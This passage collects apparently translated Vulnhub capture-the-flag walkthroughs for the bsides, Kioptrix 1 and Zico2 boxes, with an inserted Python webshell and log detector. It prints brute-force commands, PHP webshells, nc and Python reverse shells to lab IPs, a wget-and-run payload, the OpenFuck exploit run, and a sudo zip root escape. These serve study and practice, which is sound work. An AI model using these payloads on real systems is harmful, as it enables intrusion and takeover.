'></a>Vulnerability discovery</h2><ul><li>Method one:</li><li>0x01 Anonymous FTP login yields usernames</li></ul><p>On Windows, log in to the FTP server anonymously with XFTP. In the public directory there is a users.txt.bk file; open it in Notepad:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Five usernames: abatchy, john, mai, anne, doomguy</p><ul><li>0x02 SSH brute force with the five usernames and a weak-password wordlist</li></ul><p>On Windows, the Windows build of Hydra or another tool can be used; here "超級弱口令檢查工具V1.0" (Super Weak Password Checker V1.0) is used. Keep the thread count low or the VM will hang; 4 threads were used.</p><p>Wordlist: darkweb2017-top10000.txt.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The brute force yields username anne, password princess</p><p><img
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 SSH login; the user has sudo rights; get the flag </li></ul><p>Log in over SSH with Xshell as user anne, password princess</p><p>Running <code>id</code> and <code>sudo -l</code> shows that anne has sudo rights:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Run <code>sudo ls -l /root</code> and <code>sudo cat /root/flag.txt</code> to get the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Method two:</li><li>0x01 Environment setup</li></ul><p>Since a Kali VM is needed, both the bsides VM and the Kali attacker are bridged to the laptop's wireless adapter, and the bsides VM obtains a new IP. Scanning the wireless adapter's /24 with Nmap gives the bsides VM's new IP, 172.20.10.8; the Kali VM is 172.20.10.9.</p><p>Nmap command: <code>nmap -sP 192.168.56.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Anonymous FTP login again yields the five usernames: abatchy, john, mai, anne, doomguy</p><ul><li>0x02 The http service on port 80</li></ul><p>Visit <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Visiting <code>http://172.20.10.8/robots.txt</code> reveals the /backup_wordpress directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Visiting <code>http://172.20.10.8/backup_wordpress/</code> opens a WordPress site:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 Scan WordPress with wpscan and brute-force the back-end username and password:</li></ul><p>(1) Enumerate usernames: <code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer'
/></p><p>Usernames found: admin, john</p><p>(2) Brute-force the password with wpscan and a wordlist:</p><p><code>wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>The wordlist is again the darkweb2017-top10000.txt weak-password list:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The brute force succeeds: username john, password enigma</p><h2><a name='header-n9883' class='md-header-anchor '></a>Getting a shell</h2><ul><li>0x04 Log in and get a reverse shell</li></ul><p>(1) Log in to WordPress as john / enigma at <code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) There are several ways to get a shell from WordPress. Go to <code>Appearance -> Editor</code>, click <code>Theme Header</code> on the right, insert the one-line command-execution backdoor <code>&lt;?php system($_GET['cmd']); ?&gt;</code> into the editor and save.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) In Burp Suite, execute commands through the cmd parameter: requesting <code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> runs id and ls successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Get a reverse shell with nc by running <code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 172.20.10.5 4444 &gt;/tmp/f</code>; the command must be URL-encoded and then sent from Burp Suite:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) Start nc on the Windows attack machine; the reverse shell connects back:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) To make finding and transferring files easier, write a China Chopper (菜刀) one-liner: <code>echo '&lt;?php eval($_POST["123456"]);?&gt;' &gt;&gt; caidao.php</code> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' 
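referrerPolicy='no-referrer' /></p><p>Both footholds above (the <code>system($_GET['cmd'])</code> line saved into the theme header and the <code>eval($_POST[...])</code> file dropped alongside it) are the kind of thing a file-integrity or log review on the web server should catch. The scanner below is an added example written for this page, not code from the walkthrough or from WordPress; it looks for request input flowing straight into PHP execution sinks in source files, and for command-like parameters in Apache access-log lines. The file contents and log lines are constructed, and the parameter names and shell-token heuristics are assumptions, not an exhaustive signature set.</p>

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed sample contents of files under a WordPress docroot (not the page's
# files); two of them carry backdoors of the kind described above.
SAMPLE_FILES = {
    "wp-content/themes/twentyseventeen/header.php":
        "/** The header for our theme */\nget_header();\nsystem($_GET['cmd']);\n",
    "wp-content/uploads/caidao.php":
        "@eval($_POST['123456']);",
    "wp-content/themes/twentyseventeen/footer.php":
        "wp_footer();\n",
    "wp-includes/functions.php":
        "function my_escape($string) { return esc_attr($string); }\n",
}

# Constructed Apache combined-format access log lines (assumed client IPs).
SAMPLE_ACCESS_LOG = """\
172.20.10.5 - - [07/May/2018:10:15:01 +0000] "GET /backup_wordpress/?cmd=id;ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.20.10.5 - - [07/May/2018:10:15:30 +0000] "GET /backup_wordpress/?cmd=uname%20-a;id HTTP/1.1" 200 640 "-" "Mozilla/5.0"
172.20.10.7 - - [07/May/2018:10:16:00 +0000] "GET /backup_wordpress/?p=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
172.20.10.7 - - [07/May/2018:10:16:10 +0000] "GET /backup_wordpress/?s=wordpress%20themes HTTP/1.1" 200 7210 "-" "Mozilla/5.0"
172.20.10.5 - - [07/May/2018:10:17:00 +0000] "GET /backup_wordpress/?s=test;id HTTP/1.1" 200 7210 "-" "Mozilla/5.0"
"""

# An execution sink whose first argument is (optionally decoded) request input.
SINK_RE = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
    r"(?:base64_decode\s*\(\s*|stripslashes\s*\(\s*)?\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def scan_php_sources(files):
    """Return (path, sink, superglobal) for every direct input-to-sink flow."""
    hits = []
    for path, src in files.items():
        for m in SINK_RE.finditer(src):
            hits.append((path, m.group(1).lower(), "$_" + m.group(2).upper()))
    return hits


ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names webshells commonly use, and shell syntax inside a value.
COMMAND_PARAMS = {"cmd", "c", "exec", "command", "shell", "run"}
SHELL_PATTERN = re.compile(
    r"(;|\|\||\||&&|`|\$\()\s*[A-Za-z/]|\b(id|whoami|uname|nc|bash|wget|curl)\b"
)


def parse_query(query):
    """Split a query string without treating ';' as a separator (older
    urllib.parse.parse_qs versions do, which would hide 'id;ls')."""
    pairs = []
    for raw in query.split("&"):
        if raw:
            name, _, value = raw.partition("=")
            pairs.append((unquote(name), unquote_plus(value)))
    return pairs


def scan_access_log(text):
    """Return (ip, path, param, value) for requests whose query carries a
    command-style parameter name or shell syntax in a value."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for name, value in parse_query(url.query):
            if name.lower() in COMMAND_PARAMS or SHELL_PATTERN.search(value):
                findings.append((m["ip"], url.path, name, value))
    return findings


if __name__ == "__main__":
    for hit in scan_php_sources(SAMPLE_FILES):
        print("source:", hit)
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print("request:", f)
```

<p>Against the samples, the source scan flags the modified <code>header.php</code> (system fed by <code>$_GET</code>) and <code>caidao.php</code> (eval fed by <code>$_POST</code>) and nothing else; the log scan flags the two <code>cmd=</code> requests and the search query carrying <code>;id</code>, while the ordinary <code>?p=1</code> and <code>?s=wordpress themes</code> requests pass. The hardening lesson behind the theme editor step is that <code>DISALLOW_FILE_EDIT</code> in wp-config.php removes the in-browser editor entirely, so a stolen admin password no longer turns directly into code execution.</p><p><br style='display:none' 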
referrerPolicy='no-referrer' /></p><p>China Chopper connects successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>Privilege escalation</h2><ul><li>0x05 Look for user files</li></ul><p>(1) Looking through each user's files and browsing the directories turns up <code>/usr/local/bin/cleanup</code>, with permissions 777. Its contents:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/* # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This is a script that clears the Apache logs; it needs root to run, so it is executed as root.</p><p>Because cleanup is mode 777, anyone can modify and execute it, so its contents can be replaced with a reverse shell.</p><p>(2) Edit cleanup directly in China Chopper and replace it with a reverse-shell command. Python 2.7 is installed under <code>/usr/local/lib/python2.7/</code>, so a Python reverse shell can be used:</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Start nc on Windows and wait for the reverse shell; it comes back with root privileges:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Read the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>Summary of approach</h2><h3><a name='header-n9951' class='md-header-anchor 
'></a>Breakthroughs and pitfalls</h3><p>1. When there is no obvious way in, try brute-forcing the passwords of the known usernames; a wordlist of foreign passwords works better.</p><p>2. There are many ways to get a reverse shell on Linux: bash, nc, php, Python and others should all be tried.</p><p>3. Be familiar with the ways of getting a shell from the WordPress admin panel.</p><p>4. The box author hints that there are several routes in, so there are certainly others; this walkthrough used two: brute-forcing an SSH user and attacking WordPress.</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>Section 13: Kioptrix 1</h1><hr /><p>title: Vulnhub penetration-testing practice - Kioptrix 1 date: 2018-05-07 15:28:05 categories: Notes</p><h2><a name='header-n9965' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>Information gathering</h2><p>Find the target host's IP address with <code>netdiscover</code>.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 

 Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts 
 
 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 
 _____________________________________________________________________________
 IP At MAC Address Count Len MAC Vendor / Hostname 
 -----------------------------------------------------------------------------
 192.168.43.1 ac:c1:ee:31:3f:25 1 60 Xiaomi Communications Co L
 192.168.43.33 44:03:2c:68:d8:0f 1 60 Intel Corporate 
 192.168.43.54 00:0c:29:7c:3a:16 1 60 VMware, Inc. 
</pre><p>The scan shows that the target host's IP address is <code>192.168.43.54</code></p><p>Scan the host's ports with nmap: <code>nmap -A 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54 Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.43.54 Host is up (0.00055s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 1024/tcp status |_ 100024 1 1024/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux | ssl-cert: Subject: 
commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-09-26T09:32:06 |_Not valid after: 2010-09-26T09:32:06 |_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 1024/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:7C:3A:16 (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.55 ms 192.168.43.54 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds </pre><p><code>443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>The service on port 443 is <code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code></p><p>Look up related vulnerabilities with <code>searchsploit mod_ssl</code></p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c Apache mod_ssl OpenSSL < 0.9.6d / < 0. 
| exploits/unix/remote/40347.txt --------------------------------------- ---------------------------------------- Shellcodes: No Result </pre><p>The exploit script from the fourth entry can be used here; download it from <code>exploit-db</code>.</p><h2><a name='header-n9987' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck exploit</h3><p>This is a remote overflow. The downloaded exploit is quite old and needs some changes before it compiles:</p><ul><li>Compilation needs the <code>libssl-dev</code> library, specifically the version installed by <code>apt-get install libssl1.0-dev</code>.</li><li>Add the headers <code>&lt;openssl/rc4.h&gt;</code> and <code>&lt;openssl/md5.h&gt;</code> to the exploit.</li><li>Replace the URL after <code>wget</code> in the exploit with <code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code>.</li><li>Change line 961 to <code>const unsigned char * p,* end;</code></li></ul><p>Then compile</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto </pre><p>Run <code>./OpenFuck</code> and pick the entry that matches the target's system version</p><p>Here 0x6b is chosen</p><p>Run <code>./OpenFuck 0x6b 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54 ******************************************************************* * OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open * ******************************************************************* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE * * #hackarena irc.brasnet.org * * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname * * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam * * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ * ******************************************************************* Establishing SSL connection cipher: 0x4043808c ciphers: 0x80f80e0 Ready to send shellcode Spawning shell... 
bash: no job control in this shell bash-2.05$ bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; --04:04:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c => `ptrace-kmod.c' Connecting to dl.packetstormsecurity.net:80... connected! HTTP request sent, awaiting response... 301 Moved Permanently Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following] --04:04:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c => `ptrace-kmod.c' Connecting to dl.packetstormsecurity.net:443... connected! HTTP request sent, awaiting response... 200 OK Length: 3,921 [text/x-csrc] 0K ... 100% @ 3.74 MB/s 04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921] [+] Attached to 6498 [+] Waiting for signal [+] Signal caught [+] Shellcode placed at 0x4001189d [+] Now wait for suid shell... id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) whoami root </pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba exploit</h3><p>The lab environment also has a Samba vulnerability.</p><p><code>enum4linux</code> is used here: it enumerates Windows systems and Samba services over SMB to collect a large amount of important information about the target, such as user accounts, group accounts, shared directories and the password policy.</p><p>But in my local environment the Samba version was not detected.</p><p>The vulnerability is <code>Samba trans2open overflow (Linux x86)</code>, a buffer overflow found in Samba 2.2.0 through 2.2.8.</p><p>It can likewise be found with <code>searchsploit</code>.</p><p>Here the msf environment is used directly.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options Module options (exploit/linux/samba/trans2open): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.43.54 yes The target address RPORT 139 yes The target port (TCP) Payload options (linux/x86/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.43.54 no The target address Exploit target: Id Name -- 
---- 0 Samba 2.2.x - Bruteforce msf exploit(linux/samba/trans2open) > exploit [*] Started bind handler [*] 192.168.43.54:139 - Trying return address 0xbffffdfc... [*] 192.168.43.54:139 - Trying return address 0xbffffcfc... [*] 192.168.43.54:139 - Trying return address 0xbffffbfc... [*] 192.168.43.54:139 - Trying return address 0xbffffafc... [*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400 id uid=0(root) gid=0(root) groups=99(nobody) </pre><h2><a name='header-n10023' class='md-header-anchor '></a>Summary</h2><p>Although this lab environment is old, and some of these vulnerabilities are rarely seen in real engagements, the exploitation process still teaches the use of several <code>kali linux</code> tools and some practical ways of thinking.</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>Section 14: Zico2</h1><hr /><p>title: Vulnhub penetration-testing practice - Zico2 date: 2018-05-05 22:30:35 categories: Notes</p><h2><a name='header-n10031' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>vulnhub lab environment</h2><h3><a name='header-n10036' class='md-header-anchor '></a>Target address</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>Practice environment</h3><ul><li>Kali Linux VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>Information gathering</h2><p>Before gathering information we need the target's IP address. My target runs in VirtualBox in <code>Host-Only</code> network mode, and there is no way to log in to the target directly to see its IP.</p><p>Here a Kali Linux tool, <code>netdiscover</code>, an ARP-based network scanner, is used.</p><p>Run <code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>Two IP addresses come back; testing shows the right one is <code>192.168.56.102</code></p><p>Next scan the ports with <code>nmap</code></p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' 
/></p><p>Port 80 is running a web server.</p><p>Visit the web service; at this point the usual scanners can be run against the site</p><h2><a name='header-n10066' class='md-header-anchor '></a>Exploitation</h2><p>Browsing the pages, I found a file inclusion vulnerability.</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html </pre><p>Try including <code>../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The inclusion works. Next, directory scanning. Because of the campus network, only <code>Host-Only</code> mode could be used for testing, so everything was done from <code>Kali</code></p><p>The directory scan uses <code>dirb</code>, a Kali tool dedicated to brute-forcing directories.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>This finds a <code>dbadmin</code> directory</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>It is running a server application called <code>phpLiteAdmin</code>, version <code>v1.9.3</code></p><p>Looking for known vulnerabilities in this version: it has a remote PHP code injection vulnerability.</p><p>The details can be found with a search engine, or with <code>Searchsploit</code>, the Kali command-line search tool for Exploit-DB.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>This shows the vulnerability details; exploiting the remote PHP code injection requires being logged in.</p><p>So try the default password <code>admin</code>, which logs straight in.</p><p>From the <code>exploit-db</code> entry, we need to create a database and write a shell into it.</p><p>One can listen with nc for a reverse shell, or generate a PHP payload with msf and listen with it.</p><p>Following <code>exploit-db</code>, create the database: here a database named <code>shell</code> with a <code>.php</code> extension is created directly</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>and a table is added</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Create a txt file locally under <code>/var/www/html</code></p><pre class="md-fences mock-cm md-end-block" lang="">&lt;?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");?&gt; </pre><p>Then start the Apache web server</p><pre 
class="md-fences mock-cm md-end-block" lang="">service apache2 start </pre><p>然后返回到數據庫中添加字段名,類型為<code>TEXT</code>,寫入PHP代碼來下載執行shell</p><pre class="md-fences mock-cm md-end-block" lang=""><?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?> </pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>需要讓目標下載執行這串惡意代碼,需要一個HTTP請求。</p><p>這里我們就可以利用到之前發現的本地文件包含的漏洞了。</p><p>我們可以在數據庫中發現我們惡意創建的數據庫的路徑</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php </pre><p>先用nc監聽我們之前設置的端口<code>2333</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>這里我們就可以反彈一個shell了。</p><h2><a name='header-n10134' class='md-header-anchor '></a>權限提升</h2><p>在反彈了shell后,對目錄進行檢查發現了</p><p>/home/zico中有一個<code>wordpress</code>目錄,是一個常見的CMS</p><p>進入查看wp-config.php文件。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>發現了用戶zico的登錄憑證,我們可以用<code>ssh</code>來連接。</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102 </pre><p>利用<code>sudo -l</code>查看目前用戶可執行與無法執行的指令;</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>這里表明當前用戶<code>zico</code>可以利用root權限無密碼執行<code>tar</code>和<code>zip</code>命令</p><p>這里可以利用<code>touch exploit</code>創建一個隨機文件,並用<code>zip</code>命令進行壓縮</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'" </pre><ul><li>sudo 用管理員權限執行 -T 檢查文件的完整性。這個參數可以讓他執行下一個參數 --unzip-command,在這個參數中寫入一個python的交互shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>由此的到<code>root</code>權限,接下來就可以進入<code>/root</code>目錄了</p><p><code>cat /root/flag.txt</code>得到flag。</p><p><img 
src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>Summary</h2><ul><li>vulnhub offers many different environments to practise on. This was my first complete penetration exercise and I learned a lot.</li><li>At the start of the article I used <code>netdiscover</code>, an ARP-based network scanner from <code>kali linux</code>. I remember a senior's account of an interview in which he was asked why ARP is used to probe hosts on the internal network; he answered that it is quite stealthy and the results are more accurate. The main reason is that the traditional way of checking whether a remote host is alive is the ICMP echo reply (ping), and many hosts block ICMP at the firewall to avoid scanners and so stay hidden on the network.</li><li>Two languages were used for interactive shells in this article, php and python, following the foreign blog post <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>.</li><li>My own hands-on privilege-escalation experience is very limited; in this exercise I learned that you can create an arbitrary file with <code>touch exploit</code> and compress it with <code>zip</code>, which shows how little practical experience I have.</li><li>Finally, a word on the importance of English. Many of the best blogs abroad are very rich, and for someone who barely scraped past CET-4 with 425, that is frustrating; I can only rely on Baidu Translate.</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>Section 15: Kioptrix 3</h1><hr /><p>title: Vulnhub penetration-testing practice - Kioptrix 3 date: 2018-05-08 20:01:26 categories: Notes</p><h2><a name='header-n10183' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>Information gathering</h2><p>Again, find the target host with <code>netdiscover</code>.</p><pre class="md-fences mock-cm md-end-block" 